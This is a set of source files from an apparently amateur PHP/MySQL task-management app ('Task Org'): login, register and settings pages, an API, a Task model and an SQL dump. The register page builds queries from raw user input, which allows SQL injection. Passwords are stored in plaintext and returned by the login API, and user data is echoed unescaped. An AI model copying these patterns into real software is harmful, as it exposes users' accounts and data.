<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
if($_SESSION["Type"]=="boss") {
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<div class="text-center col-xs-12 col-sm-10 col-md-6" style="margin: auto; padding: 20px">
<!-- Material form contact -->
<div class="card">
<h5 class="card-header info-color white-text text-center py-4" style="background-color: #fcb628">
<strong>Settings</strong>
</h5>
<!--Card content-->
<div class="card-body px-lg-5 pt-0">
<!-- Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>" class="text-center" style="color: #757575;">
<!-- Name -->
<div class="md-form mt-3">
<input type="text" id="name" name="name" class="form-control" value="<?php echo $username?>">
<label for="name">Username</label>
</div>
<!-- E-mail -->
<div class="md-form">
<input type="password" id="password" name="password" class="form-control" value="<?php echo $password?>"><input id="pass" value="?" type="button" onclick="passChange()">
<label for="password">Password</label>
</div>
<!-- Send button -->
<button id="create" class="btn btn-outline-info btn-rounded btn-block z-depth-0 my-4 waves-effect" disabled name="submit" type="submit">Save settings</button>
</form>
<!-- Form -->
</div>
</div>
<!-- Material form contact -->
</div>
<script>
$(document).ready(function(){
$("#name").on('input', function() {
var nameLng = $("#name").val().length;
if(nameLng>3){
$( "#create" ).prop( "disabled", false );
}else{
$( "#create" ).prop( "disabled", true );
}
var passLng = $("#password").val().length;
if(passLng>3){
$( "#create" ).prop( "disabled", false );
}else{
$( "#create" ).prop( "disabled", true );
}
});
$("#password").on('input', function() {
var nameLng = $("#name").val().length;
if(nameLng>3){
$( "#create" ).prop( "disabled", false );
}else{
$( "#create" ).prop( "disabled", true );
}
var passLng = $("#password").val().length;
if(passLng>3){
$( "#create" ).prop( "disabled", false );
}else{
$( "#create" ).prop( "disabled", true );
}
});
});
function passChange() {
if(document.getElementById("password").type=="password"){
document.getElementById("password").type="text";
}else{
document.getElementById("password").type="<PASSWORD>";
}
}
</script>
<!-- Optional JavaScript -->
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="jquery-3.4.1.js"></script>
</body><file_sep><?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include_once '../../config/Database.php';
include_once '../../models/User.php';
$database = new Database();
$db = $database->connect();
$user = new User($db);
$data = json_decode(file_get_contents("php://input"));
$user->username= $data->username;
$user->password= $data->password;
$result = $user->login();
$num = $result->rowCount();
if($num==1){
$userArr = array();
$userArr['data']=array();
while ($row=$result->fetch(PDO::FETCH_ASSOC)){
$userItem= array(
'UserId'=>$row['UserId'],
'Username'=>$row['Username'],
'Password'=>$row['<PASSWORD>'],
'Type'=>$row['Type']
);
array_push($userArr['data'], $userItem);
}
echo json_encode($userArr);
}else{
echo json_encode(array('message'=>'No users found'));
}<file_sep><?php
session_start();
include('../config/connection.php');
if(isset($_SESSION["UserId"])){
header('Location:home.php');
}
$usernameErr =$username=$password= $passwordErr = "";
$check = true;
if (isset($_POST['submit'])) {
if(!empty($_POST['username'])){
if(strlen($_POST['username'])<=20) {
$username = $_POST['username'];
}else{
$usernameErr = "Username is too long";
$check = false;
}
}else{
$usernameErr = "Username is empty";
$check = false;
}
if(!empty($_POST['password'])){
if(strlen($_POST['password'])<=20) {
$password = $_POST['password'];
}else{
$passwordErr = "Password is too long";
$check = false;
}
}else{
$passwordErr = "Password is empty";
$check = false;
}
if($check) {
$check1=true;
$upit = "SELECT username FROM users";
$execute = $con->query($upit);
while ($row1 = $execute->fetch_assoc()){
if (strtolower($username) == strtolower($row1['username'])){
$check1=false;
$usernameErr="User with that name already exists.";
break;
}
}
if ($check1) {
$sql = "INSERT INTO users(id, username, password, type) VALUES (NULL,'" . $username . "','" . $password . "',2)";
$execute = $con->query($sql);
$upit = 'SELECT u.id AS UserId, u.username AS Username, u.password AS Password, t.name AS Type FROM users u,usertype t WHERE t.id=u.type AND u.username='.'"'.$username.'"';
$execute = $con->query($upit);
$row2 = $execute->fetch_assoc();
$_SESSION["Username"] = $username;
$_SESSION["Type"] = $row2['Type'];
$_SESSION["UserId"] = $row2['UserId'];
header('Location:home.php');
}
}
}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<title>Task Org</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
<link href="css/login.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
</head>
<body>
<div class="wrapper fadeInDown">
<div id="formContent">
<!-- Icon -->
<div class="fadeIn first">
<img src="img/login-icon.png" id="icon" alt="User Icon" />
</div>
<!-- Login Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>">
<input type="text" id="username" class="fadeIn second" name="username" placeholder="username">
<br>
<span style="color: red;"><?php echo $usernameErr?></span>
<input type="password" id="password" class="fadeIn third" name="password" placeholder="<PASSWORD>">
<br>
<span style="color: red;"><?php echo $passwordErr?></span>
<br>
<input type="submit" name="submit" disabled class="fadeIn fourth" value="Register" id="login">
</form>
<!-- Remind Passowrd -->
<div id="formFooter">
<a class="underlineHover" href="login.php">Already registered? Login in!</a>
</div>
</div>
</div>
</body>
</html>
<script>
$(document).ready(function(){
$('#username').on('input',function(e){
var user = $('#username').val();
if(user.length >= 4){
$( "#login" ).prop( "disabled", false );
}else{
$( "#login" ).prop( "disabled", true );
}
});
});
</script>
<file_sep>-- phpMyAdmin SQL Dump
-- version 4.9.2
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Jul 21, 2020 at 12:38 AM
-- Server version: 10.4.10-MariaDB
-- PHP Version: 7.3.12
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `tasksys`
--
-- --------------------------------------------------------
--
-- Table structure for table `statustype`
--
CREATE TABLE `statustype` (
`id` smallint(6) NOT NULL,
`name` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `statustype`
--
INSERT INTO `statustype` (`id`, `name`) VALUES
(1, 'Completed'),
(2, 'In Progress'),
(3, 'Canceled');
-- --------------------------------------------------------
--
-- Table structure for table `tasks`
--
CREATE TABLE `tasks` (
`id` int(11) NOT NULL,
`name` varchar(32) NOT NULL,
`text` varchar(300) NOT NULL,
`time` date NOT NULL,
`userId` int(11) NOT NULL,
`lng` varchar(300) NOT NULL,
`lat` varchar(300) NOT NULL,
`status` smallint(6) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `tasks`
--
INSERT INTO `tasks` (`id`, `name`, `text`, `time`, `userId`, `lng`, `lat`, `status`) VALUES
(2, 'Ociscivanje', 'Da bude sve cistije mister proper', '2020-01-25', 4, '42.441447', '19.263273', 1),
(5, 'Dostavka', 'Dostaviti potrebne materijale u bemax', '2019-12-28', 3, '43.155024', '18.844474', 2),
(7, 'Very Yes', 'Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. <NAME>, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more ', '2020-01-15', 3, '42.824970', '19.514490', 1),
(8, 'Sortiranje', 'Sortiranje nove breskve u 3 klase.', '2020-01-09', 3, '43.069519', '19.754910', 3),
(9, 'Autoput', 'Asfaltiranje novog autoputa ', '2019-12-30', 3, '43.139689', '19.599371', 2),
(10, 'Namos', 'Ugradnja klimatizacije u namos salonu namjestaja.', '2020-01-16', 3, '42.55658', '19.08472', 2),
(11, 'Ugradnja Prozora', 'Na onaj baron preko puta faksa da se nakace novi prozori', '2019-12-30', 4, '42.207141', '18.945988', 1),
(12, 'Kopanje kanala', 'Jedan dobar kanal da se ova voda makne sa puta.', '2019-12-28', 21, '42.428303', '19.270615', 2),
(13, 'Poravnanje', 'Poravnati ove trotoare po centru da nam se narod ne spotice', '2020-01-14', 26, '42.444451', '19.253637', 3),
(14, 'Planina', 'It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. <NAME>, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more', '2020-01-29', 4, '42.448466', '19.273188', 3),
(15, 'Krevet', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.', '2020-01-29', 4, '42.447341', '19.259807', 1),
(17, 'Stolica', 'Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"', '2020-02-05', 26, '42.424724', '19.241509', 1),
(19, 'Jakna', 'Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia', '2020-01-15', 21, '42.436787', '19.235449', 2),
(20, 'Prepelica', 'Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur', '2019-12-29', 21, '42.428303', '19.270615', 2),
(21, '<NAME>', 'Odnijeti 12 Euro paleta na objekat 4', '2020-03-03', 3, '42.432009', '19.267050', 2),
(23, '<NAME>', 'We work all over, had bout 5 jobs last month.', '2020-03-03', 26, '42.432009', '19.267050', 2),
(24, '<NAME>', 'Potrebno je izmijesati 520kg breskve za proizvodnju dzema', '2020-05-13', 3, '42.428303', '19.270615', 2);
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(11) NOT NULL,
`username` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL,
`type` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `username`, `password`, `type`) VALUES
(2, 'marko', 'marko', 2),
(3, 'ivan', '<PASSWORD>', 2),
(4, 'vladimir', 'vladimir', 2),
(5, 'miroslav', 'miroslav', 4),
(21, 'mirko', 'mirko', 3),
(22, 'nemanja', '<PASSWORD>', 1),
(25, 'misha', 'misha', 4),
(26, 'jovan', 'jovan', 2),
(27, 'jocko', 'jocko', 2);
-- --------------------------------------------------------
--
-- Table structure for table `usertype`
--
CREATE TABLE `usertype` (
`id` int(11) NOT NULL,
`name` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `usertype`
--
INSERT INTO `usertype` (`id`, `name`) VALUES
(1, 'boss'),
(2, 'worker'),
(3, 'manager'),
(4, 'banned');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `statustype`
--
ALTER TABLE `statustype`
ADD PRIMARY KEY (`id`) USING BTREE;
--
-- Indexes for table `tasks`
--
ALTER TABLE `tasks`
ADD PRIMARY KEY (`id`),
ADD KEY `status` (`status`),
ADD KEY `userId` (`userId`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`),
ADD KEY `type` (`type`);
--
-- Indexes for table `usertype`
--
ALTER TABLE `usertype`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `statustype`
--
ALTER TABLE `statustype`
MODIFY `id` smallint(6) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `tasks`
--
ALTER TABLE `tasks`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=25;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;
--
-- AUTO_INCREMENT for table `usertype`
--
ALTER TABLE `usertype`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `tasks`
--
ALTER TABLE `tasks`
ADD CONSTRAINT `tasks_ibfk_1` FOREIGN KEY (`userId`) REFERENCES `users` (`id`) ON UPDATE NO ACTION,
ADD CONSTRAINT `tasks_ibfk_2` FOREIGN KEY (`status`) REFERENCES `statustype` (`id`) ON UPDATE NO ACTION;
--
-- Constraints for table `users`
--
ALTER TABLE `users`
ADD CONSTRAINT `users_ibfk_1` FOREIGN KEY (`type`) REFERENCES `usertype` (`id`) ON UPDATE NO ACTION;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep><?php
session_start();
include('../config/connection.php');
if(isset($_SESSION["UserId"])){
header('Location:home.php');
}
$username= $password =$msg = "";
$check = true;
if (isset($_POST['submit'])) {
if(!empty($_POST['username'])){
$username = $_POST['username'];
}else{
$check = false;
}
if(!empty($_POST['password'])){
$password = $_POST['password'];
}else{
$check = false;
}
if($check) {
$upit = 'SELECT u.id AS UserId, u.username AS Username, u.password AS Password, t.name AS Type FROM users u,usertype t WHERE t.id=u.type';
$execute = $con->query($upit);
while ($row = $execute->fetch_assoc()) {
if ($row['Username'] == $username && $row['Password'] == $password) {
if($row['Type']=="banned"){
$msg="You are banned";
}else {
$_SESSION["Username"] = $username;
$_SESSION["Type"] = $row['Type'];
$_SESSION["UserId"] = $row['UserId'];
header('Location:home.php');
}
}
}
}
}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<title>Task Org</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
<link href="css/login.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
</head>
<body>
<div class="wrapper fadeInDown">
<div id="formContent">
<!-- Icon -->
<div class="fadeIn first">
<img src="img/login-icon.png" id="icon" alt="User Icon" />
</div>
<!-- Login Form -->
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>">
<input type="text" id="username" class="fadeIn second" value="<?php echo $username?>" name="username" placeholder="username">
<input type="<PASSWORD>" id="password" class="fadeIn third" name="password" placeholder="<PASSWORD>">
<br><span style="color:red"><?php echo $msg?></span><br>
<input type="submit" name="submit" disabled class="fadeIn fourth" value="Log In" id="login">
<div id="error"></div>
</form>
<!-- Remind Passowrd -->
<div id="formFooter">
<a class="underlineHover" href="register.php">Register?</a>
</div>
</div>
</div>
</body>
</html>
<script>
$(document).ready(function(){
$('#username').on('input',function(e){
var user = $('#username').val();
if(user.length >= 4){
$( "#login" ).prop( "disabled", false );
}else{
$( "#login" ).prop( "disabled", true );
}
});
});
</script>
<file_sep><?php
class Task{
private $conn;
private $table = 'tasks';
public $id;
public $name;
public $text;
public $time;
public $userId;
public $lng;
public $lat;
public $status;
public function __construct($db)
{
$this->conn=$db;
}
public function read(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id ORDER BY t.time ASC';
$stmt=$this->conn->prepare($query);
$stmt->execute();
return $stmt;
}
public function readById(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,
t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,
t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id AND t.id = ?';
$stmt=$this->conn->prepare($query);
$stmt->bindParam(1, $this->id);
$stmt->execute();
return $stmt;
}
public function readByUser(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,
t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,
t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id AND t.userId = ? ORDER BY t.time ASC';
$stmt=$this->conn->prepare($query);
$stmt->bindParam(1, $this->id);
$stmt->execute();
$row = $stmt->fetch(PDO::FETCH_ASSOC);
$this->id=$row['TaskId'];
$this->name=$row['Name'];
$this->text=$row['Description'];
$this->time=$row['Time'];
$this->userId=$row['WorkerId'];
$this->lng=$row['Longitude'];
$this->lat=$row['Latitude'];
$this->status=$row['Status'];
return $stmt;
}
public function readByStatus(){
$query='SELECT t.name AS Name,t.id AS TaskId,t.text AS Description,
t.time AS Time,u.username AS Worker,u.id AS WorkerId,s.name AS Status,
t.lng AS Longitude,t.lat AS Latitude FROM tasks t,users u,statustype s WHERE u.id=t.userId AND t.status=s.id AND t.status = ? ORDER BY t.time ASC';
$stmt=$this->conn->prepare($query);
$stmt->bindParam(1, $this->id);
$stmt->execute();
$row = $stmt->fetch(PDO::FETCH_ASSOC);
$this->id=$row['TaskId'];
$this->name=$row['Name'];
$this->text=$row['Description'];
$this->time=$row['Time'];
$this->userId=$row['WorkerId'];
$this->lng=$row['Longitude'];
$this->lat=$row['Latitude'];
$this->status=$row['Status'];
return $stmt;
}
public function create() {
$query = 'INSERT INTO ' . $this->table .
' SET name = :name,
text = :text,
time = :time,
userId = :userId,
lng = :lng,
lat = :lat,
status = :status';
$stmt = $this->conn->prepare($query);
$this->name = htmlspecialchars(strip_tags($this->name));
$this->text = htmlspecialchars(strip_tags($this->text));
$this->time = htmlspecialchars(strip_tags($this->time));
$this->userId = htmlspecialchars(strip_tags($this->userId));
$this->lng = htmlspecialchars(strip_tags($this->lng));
$this->lat = htmlspecialchars(strip_tags($this->lat));
$this->status = htmlspecialchars(strip_tags($this->status));
$stmt->bindParam(':name', $this->name);
$stmt->bindParam(':text', $this->text);
$stmt->bindParam(':time', $this->time);
$stmt->bindParam(':userId', $this->userId);
$stmt->bindParam(':lng', $this->lng);
$stmt->bindParam(':lat', $this->lat);
$stmt->bindParam(':status', $this->status);
// Execute query
if($stmt->execute()) {
return true;
}
// Print error if something goes wrong
printf("Error: %s.\n", $stmt->error);
return false;
}
public function update() {
$query = 'UPDATE ' . $this->table .
' SET name = :name,
text = :text,
time = :time,
userId = :userId,
lng = :lng,
lat = :lat,
status = :status WHERE id = :id';
$stmt = $this->conn->prepare($query);
$this->name = htmlspecialchars(strip_tags($this->name));
$this->text = htmlspecialchars(strip_tags($this->text));
$this->time = htmlspecialchars(strip_tags($this->time));
$this->userId = htmlspecialchars(strip_tags($this->userId));
$this->lng = htmlspecialchars(strip_tags($this->lng));
$this->lat = htmlspecialchars(strip_tags($this->lat));
$this->status = htmlspecialchars(strip_tags($this->status));
$this->id = htmlspecialchars(strip_tags($this->id));
$stmt->bindParam(':name', $this->name);
$stmt->bindParam(':text', $this->text);
$stmt->bindParam(':time', $this->time);
$stmt->bindParam(':userId', $this->userId);
$stmt->bindParam(':lng', $this->lng);
$stmt->bindParam(':lat', $this->lat);
$stmt->bindParam(':status', $this->status);
$stmt->bindParam(':id', $this->id);
// Execute query
if($stmt->execute()) {
return true;
}
// Print error if something goes wrong
printf("Error: %s.\n", $stmt->error);
return false;
}
public function delete() {
$query = 'DELETE FROM ' . $this->table . ' WHERE id = :id';
$stmt = $this->conn->prepare($query);
$this->id = htmlspecialchars(strip_tags($this->id));
$stmt->bindParam(':id', $this->id);
if($stmt->execute()) {
return true;
}
// Print error if something goes wrong
printf("Error: %s.\n", $stmt->error);
return false;
}
}<file_sep><?php
$server = 'localhost';
$user = 'root';
$pass = '';
$baza = '<PASSWORD>';
$con = new mysqli($server,$user,$pass,$baza);
if(!$con->connect_error){
return true;
}else{
die("Connection error" . $con->connect_error);
}<file_sep><?php
session_start();
if (!isset($_SESSION["UserId"])) {
header('Location:index.php');
}
//if(isset ($_SESSION["Type"])=="banned"){
// echo '<script type="text/javascript">';
// echo ' alert("You have been banned")'; //not showing an alert box.
// echo '</script>';
// header('Location:home.php');
//}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
<link href="css/home.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
<a class="nav-link dropdown-toggle" href="http://example.com" id="dropdown04" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding: 10px; font-size: large"><?php echo $_SESSION["Username"]?></a>
<div class="dropdown-menu" aria-labelledby="dropdown04">
<a class="dropdown-item" data-toggle="modal" data-target="#exampleModalCenter" href="#">Log out</a>
<a class="dropdown-item" href="userSettings.php">Settings</a>
<?php
if($_SESSION["Type"]=="boss" || $_SESSION["Type"]=="manager"){
echo '<a class="dropdown-item" href="createTask.php">Create Task</a>';
}
if($_SESSION["Type"]=="boss") {
echo '<a class="dropdown-item" href="manage.php">Manage</a>';
}
?>
</div>
</li>
</ul>
</form>
</div>
</nav>
<!--Table-->
<table class="table table-striped w-min" style="width: auto; margin: auto">
<!--Table head-->
<thead id="theader">
</thead>
<!--Table head-->
<!--Table body-->
<tbody id="tbodyy">
</tbody>
<!--Table body-->
</table>
<!--Table-->
<!-- Button trigger modal -->
<!-- Modal -->
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLongTitle">Log out</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
Are you sure you want to log out?
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
<a href="logout.php" class="btn btn-primary" style="background-color: #e3a529; border-color: #e3b829;">Log out</a>
</div>
</div>
</div>
</div>
<script>
$(document).ready(function(){
if("<?php echo $_SESSION["Type"]?>"=="boss" || "<?php echo $_SESSION["Type"]?>"=="manager"){
$.ajax({
url:"../api/task/read.php",
dataType:"JSON",
success:function(data)
{
$('#theader').append($('<tr>')
.append($('<th>').append("#"))
.append($('<th>').append("Name"))
.append($('<th>').append("Description"))
.append($('<th>').append("Worker"))
.append($('<th>').append("Status"))
.append($('<th>').append("Time"))
.append($('<th>').append($('<select onselect="hoho(this);"class="form-control" id="statusSelect">').append('<option value="all">all</option><option value="1">Completed</option><option value="2">In progress</option><option value="3">Canceled</option>')))
);
$( "#statusSelect" ).change(function() {
var selected = $("#statusSelect").val();
if(selected=="all"){
$('#tbodyy').empty();
$.ajax({
url:"../api/task/read.php",
data:{id:selected},
dataType:"JSON",
success:function(data)
{
$('#tbodyy').empty();
var i;
for (i = 0; i < data.length; i++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[i].TaskId))
.append($('<td>').append(data[i].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[i].Description))
.append($('<td>').append(data[i].Worker))
.append($('<td>').append(data[i].Status))
.append($('<td>').append(data[i].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[i].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}else{
$.ajax({
url:"../api/task/readByStatus.php",
data:{id:selected},
dataType:"JSON",
success:function(data)
{
$('#tbodyy').empty();
var i;
for (i = 0; i < data.length; i++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[i].TaskId))
.append($('<td>').append(data[i].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[i].Description))
.append($('<td>').append(data[i].Worker))
.append($('<td>').append(data[i].Status))
.append($('<td>').append(data[i].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[i].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}
});
var i;
for (i = 0; i < data.length; i++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[i].TaskId))
.append($('<td>').append(data[i].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[i].Description))
.append($('<td>').append(data[i].Worker))
.append($('<td>').append(data[i].Status))
.append($('<td>').append(data[i].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[i].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}else{
$.ajax({
url:"../api/task/readByUser.php",
data:{id:"<?php echo $_SESSION["UserId"]?>"},
dataType:"JSON",
success:function(data)
{
$('#theader').append($('<tr>')
.append($('<th>').append("#"))
.append($('<th>').append("Name"))
.append($('<th>').append("Description"))
.append($('<th>').append("Status"))
.append($('<th>').append("Time"))
.append($('<th>').append($('<select class="form-control" id="statusSelect">').append('<option value="all">all</option><option value="1">Completed</option><option value="2">In progress</option><option value="3">Canceled</option>')))
);
var j;
for (j = 0; j < data.length; j++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[j].TaskId))
.append($('<td>').append(data[j].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[j].Description))
.append($('<td>').append(data[j].Status))
.append($('<td>').append(data[j].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[j].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
$( "#statusSelect" ).change(function() {
var selected = $("#statusSelect").val();
if(selected=="all"){
$('#tbodyy').empty();
$.ajax({
url:"../api/task/readByUser.php",
data:{id:"<?php echo $_SESSION["UserId"]?>"},
dataType:"JSON",
success:function(data)
{
var j;
for (j = 0; j < data.length; j++) {
$('#tbodyy').append($('<tr>')
.append($('<td>').append(data[j].TaskId))
.append($('<td>').append(data[j].Name))
.append($('<td style="word-wrap: break-word;max-width: 400px;">').append(data[j].Description))
.append($('<td>').append(data[j].Status))
.append($('<td>').append(data[j].Time))
.append($('<td>').append('<a href="taskDetails.php?id='+data[j].TaskId+'"><button type="button" class="btn peach-gradient">Details</button></a>'))
)
}
},error:function (request) {
console.log(request.responseText);
}
})
}else{
$.ajax({
